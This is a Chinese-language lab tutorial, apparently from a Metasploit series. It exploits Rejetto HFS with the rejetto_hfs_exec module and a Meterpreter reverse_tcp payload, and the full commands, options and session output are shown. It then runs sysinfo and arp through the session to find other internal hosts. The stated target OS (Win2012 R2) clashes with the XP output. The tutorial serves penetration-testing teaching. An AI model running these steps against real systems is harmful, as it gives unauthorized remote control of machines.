Metasploit实战三之——使用Metasploit获取目标的控制权限

Metasploit实战三之——使用Metasploit获取目标的控制权限

攻击机： Kali 192.168.175.128 靶机： Win2012 R2 192.168.175.130 我们确定了目标系统的漏洞和Metasploit的可利用模块，接下来我们就真正获取目标的控制权限。 msfconsole use exploit/windows/http/rejetto_hfs_exec set RHOST 192.168.175.130 set RPORT 8080 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.175.128 exploit 具体操作如下： msf5 > use exploit/windows/ msf5 exploit(windows/> set RHOST 192.168.175.130 RHOST => 192.168.175.130 msf5 exploit(windows/> set RPORT 8080 RPORT => 8080 msf5 exploit(windows/> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/> set LHOST 192.168.175.128 LHOST => 192.168.175.128 msf5 exploit(windows/> show options Module options (exploit/windows/http/rejetto_hfs_exec): Name Current Setting Required Description ---- --------------- -------- ----------- HTTPDELAY 10 no Seconds to wait before terminating web server Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.175.130 yes The target address range or CIDR identifier RPORT 8080 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes The path of the web application URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.175.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(windows/> exploit [*] Started reverse TCP handler on 192.168.175.128:4444 [*] Using URL: http://0.0.0.0:8080/OHqKAjyg9dj9u [*] Local IP: http://192.168.175.128:8080/OHqKAjyg9dj9u [*] Server started. [*] Sending a malicious request to / [*] Payload request received: /OHqKAjyg9dj9u [*] Sending stage (179779 bytes) to 192.168.175.130 [*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1091) at 2019-01-23 11:32:15 +0800 [!] Tried to delete %TEMP%\OmpsEelxzVs.vbs, unknown result [*] Server stopped. meterpreter > 执行完后，我们就获得了目标主机的控制权。 接下来，我们看看内网中有没有其他主机，如下所示： meterpreter > sysinfo Computer : LIUYAZHUANG OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > meterpreter > arp ARP cache ========= IP address MAC address Interface ---------- ----------- --------- 192.168.175.2 00:50:56:e7:f5:30 2 192.168.175.128 00:0c:29:68:65:5b 2 192.168.175.131 00:0c:29:cf:f6:ac 2 meterpreter > 可以看到内网中有一台192.168.175.131的主机。

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。